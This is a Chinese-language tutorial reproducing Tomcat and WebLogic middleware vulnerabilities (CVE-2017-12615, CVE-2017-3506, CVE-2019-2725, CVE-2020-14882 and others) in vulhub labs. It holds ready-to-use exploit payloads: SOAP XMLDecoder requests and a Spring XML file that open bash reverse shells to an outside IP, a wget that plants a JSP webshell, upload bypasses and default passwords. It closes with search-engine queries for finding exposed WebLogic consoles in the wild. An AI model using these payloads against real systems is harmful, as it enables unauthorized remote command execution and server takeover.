常见的中间件漏洞

1.Tomcat

Tomcat介绍

tomcat是⼀个开源而且免费的jsp服务器，默认端口 : 8080，属于轻量级应⽤服务器。它可以实现 JavaWeb程序的装载，是配置JSP（Java Server Page）和JAVA系统必备的⼀款环境。

在历史上也披露出来了很多的漏洞 , 这⾥我们讲几个经典的漏洞复现

1.1 CVE-2017-12615

漏洞描述

当在Tomcat的conf（配置目录下）/web.xml配置文件中添加readonly设置为false时，将导致该漏洞产

⽣，（需要允许put请求） , 攻击者可以利⽤PUT方法通过精心构造的数据包向存在漏洞的服务器里面上

传 jsp⼀句话文件，从而造成远程命令执行，getshell等。

环境搭建

cd vulhub/tomcat/CVE-2017-12615
docker-compose up -d

漏洞复现

用BP抓包获取数据

然后用哥斯拉来生成一个jsp木马

管理-->生成

在头部改成PUT提交;写上文件名

下面写我们的木马语句

在这里我们得绕过;他会过滤掉我们的jsp

PUT/1.jsp/
PUT/1.jsp%20
PUT/1.jsp::$DATA

我们去访问;上传成功就去连接

1.2 后台弱口令部署war包

在tomcat8环境下默认进入后台的密码为 tomcat/tomcat ，未修改造成未授权即可进入后台，或者管理员把密码设置成弱口令(前提人家必须是弱口令)

漏洞复现

在我们之前生成的jsp木马(1.jsp)给他打包成zip;后缀改位war

我们去访问一下访问成功就去连接

1.3 CVE-2020-1938(文件包含)

由于Tomcat AJP协议设计上的缺陷，攻击者通过Tomcat AJP Connector 可以读取或包含Tomcat上所有

Webapp目录下的任意文件

漏洞复现

python cve-2020-1938.py -p 8009 -f /WEB-INF/web.xml 8.155.7.133

2.WebLogic

Weblogic介绍

WebLogic是美国Oracle公司出品的⼀个application server，确切的说是⼀个基于JAVAEE架构的中间 件，默认端⼝：7001 WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和数据 库应⽤的Java应⽤服务器。将Java的动态功能和Java Enterprise标准的安全性引⼊⼤型⽹络应⽤的开 发、集成、部署和管理之中。

2.1 后台弱口令GetShell

#靶场搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d

漏洞复现

默认账号密码：weblogic/Oracle@123

weblogic常用弱口令：https://cirt.net/passwords?criteria=weblogic

这⾥注意， 单个账号错误密码5次之后就会⾃动锁定。

地址/console/login/LoginForm.jsp

1.登录后台后，点击部署，点击安装，点击上传⽂件

2.上传war包，jsp木马压缩成zip，修改后缀为war，上传

可以看到我们的war包

然后去访问我们的木马;哥斯拉连接

2.2 CVE-2017-3506

cd vulhub-master/weblogic/weak_password
docker-compose up -d

漏洞复现

#访问以下⽬录中的⼀种，有回显如下图可以判断wls-wsat组件存在
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

1.验证是否存在wls-wsat组件

/wls-wsat/CoordinatorPortType

2.在当前页面抓包之后，添加下面请求包，反弹shell。

先监听我们的6666端口

修改请求方式;构造POC

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>bash -i &gt;&amp; /dev/tcp/8.155.7.133/6666 0&gt;&amp;1</string></void></array><void method="start"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/>
</soapenv:Envelope>

反弹成功

2.3 CVE-2019-2725

wls9-async等组件为WebLogic Server提供异步通讯服务，默认应用于WebLogic部分版本。由于该

WAR包在反序列化处理输入信息时存在缺陷，攻击者通过发送精心构造的恶意 HTTP 请求，即可获得⽬

标服务器的权限，在未授权的情况下远程执行命令。

cd vulhub-master/weblogic/weak_password
docker-compose up -d

漏洞复现

IP地址/_async/AsyncResponseService

如果出现以下页面，则说明存在漏洞

2.在当前页面抓包 , 修改请求包 , 写入shell

现在我们的home下创建1.txt;并写进jsp木马

python3 -m http.server 6666

修改请求方法;构造POC

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://8.155.7.133/1.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

3.访问下载到weblogic服务器上的木马

ip地址/bea_wls_internal/678.jsp

2.4 CVE-2018-2628

#靶场搭建
cd vulhub-master/weblogic/CVE-2018-2628 
docker-compose up -d

漏洞复现

者直接使用利用ONE-FOX⼯具（Liqun⼯具箱）

2.5 CVE-2018-2894

#靶场搭建
cd vulhub-master/weblogic/CVE-2018-2894 
docker-compose up -d
这⾥环境后台密码是随机得，获取密码: docker-compose logs | grep password

Weblogic Web Service Test Page中⼀处任意⽂件上传漏洞，Web Service Test Page 在 "⽣产模式" 下默认不开启，所以该漏洞有⼀定限制。

设置Web服务测试开启

IP地址/console/login/LoginForm.jsp

设置web服务测试开启： 域结构 -> base-domain -> ⾼级 -> 启动Web服务测试⻚

点击保存 ;进入 config.do 文件进行设置，将目录设置为 ws_utc 应用的静态文件css目录，访问这个目录是无需权限的，这⼀点很重要

IP地址/ws_utc/config.do
#更改目录
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

漏洞复现

1.点击安全 , 点击添加

2.右键审查元素 , 然后搜索16 , 找到对应时间戳

这个是我们的时间戳

121.40.229.129:7001/ws_utc/css/config/keystore/1726815031601_shell.jsp

2.6 CVE-2020-14882

WebLogic远程代码执行漏洞

CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证。

CVE-2020-14883 允许经过身份验证的用户在管理员控制台组件上执行任何命令。

使用这两个漏洞链，未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机

#靶场搭建
cd vulhub-master/weblogic/CVE-2020-14882 
docker-compose up -d

漏洞复现

#访问管理控制台
http://IP:7001/console/login/LoginForm.jsp
#使⽤以下url绕过登录认证
http://IP:7001/console/css/%252e%252e%252fconsole.portal

未授权访问绕过

http://IP:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabe=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success');")

可以看到执行成功了

这种利用方法只能在 Weblogic 12.2.1 及以上版本中使用，因为 10.3.6 没有 class

另外⼀种⽅式

#制作一个恶意XML文件，将其提供到Weblogic可以访问得服务器上
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instancexsi:schemaLocation="http://www.springframework.org/schema/beanshttp://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb" class="java.lang.ProcessBuilder" init-method="start"><constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash -i &gt;&amp; /dev/tcp/8.155.7.133/6666 0&gt;&amp;1]]></value>
</list>
</constructor-arg></bean>
</beans>#然后通过以下 URL，Weblogic 将加载此 XML 并执⾏其中的命令
http://8.155.7.133:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://8.155.7.133:8888/1.xml")

实战挖掘
"weblogic"
app="Oracle-WebLogic-Server-管理控制台"
app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"
推荐 :
"WebLogic" && port="7001" && country="CN" && title=="Error 404--Not Found"